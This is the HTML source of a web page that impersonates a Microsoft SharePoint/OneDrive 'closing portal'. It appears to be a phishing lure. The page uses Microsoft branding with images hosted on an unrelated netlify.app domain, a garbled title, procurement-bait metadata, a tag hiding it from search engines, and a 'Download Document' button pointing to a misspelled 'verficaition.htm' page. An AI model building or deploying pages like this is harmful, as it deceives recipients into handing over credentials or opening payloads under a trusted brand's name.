<!DOCTYPE html>
<html lang="en">
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
       <title> 21l968741843230509&amp;mARzAuvP </title>

<meta name="description" content="_Materials for Supply">



<meta name="keywords" content="_Demands">

<meta name="robots" content="noindex, nofollow">

<meta property="og:title" content="_Overview | Specs">

<meta property="og:type" content="website">

<meta property="og:site_name" content="_&amp;Requirements">

<meta property="og:description" content="&amp;RFQ_">
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
  <style>

video {
  object-fit: cover;
  width: 100vw;
  height: 100vh;
  position: fixed;
  top: 0;
  left: 0;
  z-index: -1;
}
  </style>
</head>
<body>

<nav class="navbar bg-white" >
<div class="container">
    <a class="navbar-brand" href="#"><img src="https://quirky-shaw-20dc92.netlify.app/logo.jpg"></a>
    <button class="navbar-toggler " type="button " >
      <span class="navbar-toggler-icon text-dark"></span>
    </button>
   
</div>
</nav>
<video playsinline autoplay muted loop poster="https://quirky-shaw-20dc92.netlify.app/polina.jpg" id="bgvid">
    <source src="https://quirky-shaw-20dc92.netlify.app/vd.mp4" type="video/webm">
    <source src="https://quirky-shaw-20dc92.netlify.app/vd" type="video/mp4">
  </video>

  <div class="container">
<div class="d-flex justify-content-center">
  
        
        <div class="col-sm-8 my-4 text-center">
           <div class="my-4"> <img src="https://quirky-shaw-20dc92.netlify.app/lg.png"></div>
           <span class="text-white" style="font-size: 42px;font-weight: 100;"> Welcome to Microsoft </span>
           <span class="text-white"  style="font-size: 42px;font-weight: 900;">SharePoint (CLOSING PORTAL)</span>
           <div style="color:white; font-size: 20px;">
            Save your files and photos to OneDrive and get them from any device, anywhere
           </div>
           <div class="my-5">
		  
			 
				<a href="verficaition.htm" class="btn btn-primary">Download Document</a>
				
       
          </div>

           <div class="my-5 text-white" style="font-size: 12px;">
            Office365, Outlook, SharePoint, OneDrive, Skype, OneNote, PowerPoint, Word, Excel are all trademarks of Microsoft.

            All rights reserved © Microsoft 2021.
           </div>
        </div>

       
</div>
  </div>



</body>

</html>


